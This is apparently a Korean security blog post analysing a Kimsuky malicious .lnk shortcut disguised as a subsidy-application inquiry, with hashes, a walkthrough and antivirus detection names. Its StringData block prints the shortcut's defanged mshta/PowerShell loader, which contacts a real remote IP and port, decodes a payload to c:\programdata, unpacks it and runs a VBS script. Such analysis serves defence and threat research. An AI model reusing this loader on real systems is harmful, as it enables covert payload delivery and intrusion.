꿈을꾸는 파랑새

오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 보조금신청 관련문의건 으로 위장하는 악성코드(2024.9.23)에 대해 알아보겠습니다.
일단 제목이 보조금신청 관련문의건 인 것으로 보아서 보조금을 관련 전기차 보조금 등 각종 보조금 관련해서 해킹하기 위해서 준비한 것처럼 생각됩니다. 먼저 해쉬값은 다음과 같습니다.
파일명:보조금신청 관련문의건.docx.lnk
사이즈:2.36 KB
MD5:1f29ccc30a6d053fcbc5210d921ac721
SHA-1:35b7c9abc46750e9c1f672086427326d4d18669b
SHA-256:24a0124e2e38407f2062dc2bfb0bd474413a10d80ef8e1913ecfa699d962229f
해당 악성코드를 열어보면 다음과 같이 되어져 있는 것을 확인을 할수가 있음

보조금신청 관련건 악성코드 내부
보조금신청 관련건 악성코드 내부

StringData
{
 namestring: not present
 relativepath: ..\..\..\Windows\Sys(t)em32\mshta(.)exe
 workingdir: C:\Windows\Sy(s)tem32
 commandlinearguments: javasc(r)ipt:p="se6(4)String($z);$";s="Str(e)am";
 w="a=new Act"+"iveXObject('WScr"(+)"ipt.Shell');a.Run(c,(0),0);close();"
 ;a="System(.)IO."+s;t=" -Path $t -";n="New-(O)bject System.";d="c:\\prog
 ra(m)data";c="power"(+)"shell -ep bypass -c $r='64(.)49(.)14(.)181';$p='8
 014';$r="+n(+)"IO."+s+"Reader(("+n+"Net(.)Sockets.TcpClient($r, $p)).Get"
 (+)s(+)"());$z=$r.ReadLine();$b=[Con"(+)"vert]::FromBa"+p+"t='"+d+"\\t.zip
 ';Set-Content"+t+"V $b -Encoding By(t)e;Expand-Archive"(+)t+"D "(+)d+";del
 $t;$v='"+d+"\\s(.)vbs';&$v;sc "+d+"\\nt9(1)48 81";eval(w);
 iconlocation: (.)docx

}

local_base_path: C:\Windows\System32\mshta.exe

악성코드 분석

해당 악성코드는 악성 스크립트를 실행하기 위해 Windows의 기본 시스템 파일인 mshta.exe를 사용을 하는것이 특징이며 
간단하게 분석을 하면 다음과 같습니다.
1.commandlinearguments 에 지정된 명령 줄 인수는 JavaScript 코드로 PowerShell 명령을 실행하도록 구성되어 있음
변수를 설정하고 ActiveXObject를 사용해 WScript.Shell을 생성
WScript.Shell은 명령을 실행할 수 있는 객체
해당 $r 은 원격 서버의 IP 주소(64(.)49(.)14(.)181)를 $p는 포트 번호(8014)를 나타내며 악성 코드는 해당 원격 서버에 연결을 시도
PowerShell을 이용하여 원격 서버에 TCP 연결을 시도하며 연결을 통해 추가 데이터인 t.zip 가져옵니다.
그리고 서버로부터 읽어온 데이터를 $z 변수에 저장
원격 서버로부터 받은 Base64 인코딩된 데이터를 디코딩
3. 악성 페이로드 저장 및 실행
원격 서버에서 받은 데이터를 디코딩하고 임시 파일(c:\programdata\t.zip )에 저장하고 이를 압축 해제하고 해당 내용을 프로그램 데이터 디렉터리(c:\programdata)로 이동합니다.
c:\programdata\s.vbs 파일을 실행하고 이후 서비스 제어 명령(sc)을 통해 악성 코드를 추가로 실행

악성코드 가 생성한 t.zip
악성코드 가 생성한 t.zip

일단 지난번에 소개한 업비트 관련한 악성코드 와 같은 64(.)49(.)14(.)181를 사용을 하면 해당 사이트는 폐쇄되었는지 이제는 programdata 폴더에서는 t.zip만 생성되고 추가적인 행동이 이루어지지 않아서 더는 동작은 하지 않습니다. 대충 제목으로 추측하면 보조금신청 관련문의건 으로 위장을 해서 해당 기관들 털려는 시도가 아닐까 생각이 됩니다.
2024-09-25 06:26:59 UTC 기준 탐지하는 보안 업체들은 다음과 같습니다.

[소프트웨어 팁/보안 및 분석] - 김수키(Kimsuky)암호화폐 거래소 업비트 사칭 악성코드-Upbit_20240916 docx lnk(2024.9.17)

 

김수키(Kimsuky)암호화폐 거래소 업비트 사칭 악성코드-Upbit_20240916 docx lnk(2024.9.17)

오늘은 우리 북한 해킹 단체인 김수키(Kimsuky)에서 만든 암호화폐 거래소 업비트 사칭 악성코드-Upbit_20240916 docx lnk(2024.9.17)에 대해 글을 적어 보겠습니다.일단 먼저 해당 악성코드 

wezard4u.tistory.com

AliCloud:Trojan:Multi/KimSuky.AS8PHU
ALYac:Trojan.Agent.LNK.Gen
Arcabit:Heur.BZC.YAX.Pantera.41.CEF2A604
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
BitDefender:Heur.BZC.YAX.Pantera.41.CEF2A604
CTX:Lnk.trojan.kimsuky
Emsisoft:Heur.BZC.YAX.Pantera.41.CEF2A604 (B)
eScan:Heur.BZC.YAX.Pantera.41.CEF2A604
ESET-NOD32:A Variant Of Generik.MWZMHMO
GData:Heur.BZC.YAX.Pantera.41.CEF2A604
Google:Detected
Huorong:Trojan/LNK.Starter.bj
Ikarus:Trojan.Win32.Kimsuky
Kaspersky:HEUR:Trojan.Multi.Runner.c
Kingsoft:Script.Troj.CMDLnk.22143
Lionic:Trojan.WinLNK.Pantera.4!c
Microsoft:Trojan:Win32/KimSuky.AT!MTB
Sophos:Mal/DownLnk-D
Symantec:Trojan.Gen.NPE
Tencent:Win32.Trojan.Runner.Gtgl
Trellix (ENS):LNK/Agent!1F29CCC30A6D
Trellix (HX):Heur.BZC.YAX.Pantera.41.CEF2A604
VIPRE:Heur.BZC.YAX.Pantera.41.CE9EAB30
VirIT:Trojan.LNK.Agent.DBY
WithSecure:Trojan:W32/LnkGen.C
ZoneAlarm by Check Point:HEUR:Trojan.Multi.Runner.c
Zoner:Probably Heur.LNKScript
입니다. C2 서버와의 통신 및 최종 페이로드 실행을 통해 스파이 관련 활동에서 정보를 유출하거나 시스템을 조작할 가능성이 있는 장기간 동안 피해자의 시스템에 지속적으로 액세스하는 것을 목표인 것을 확신 간단하게 우리의 주적 북한 해킹 단체 Kimsuky 에 대해 알아보았습니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band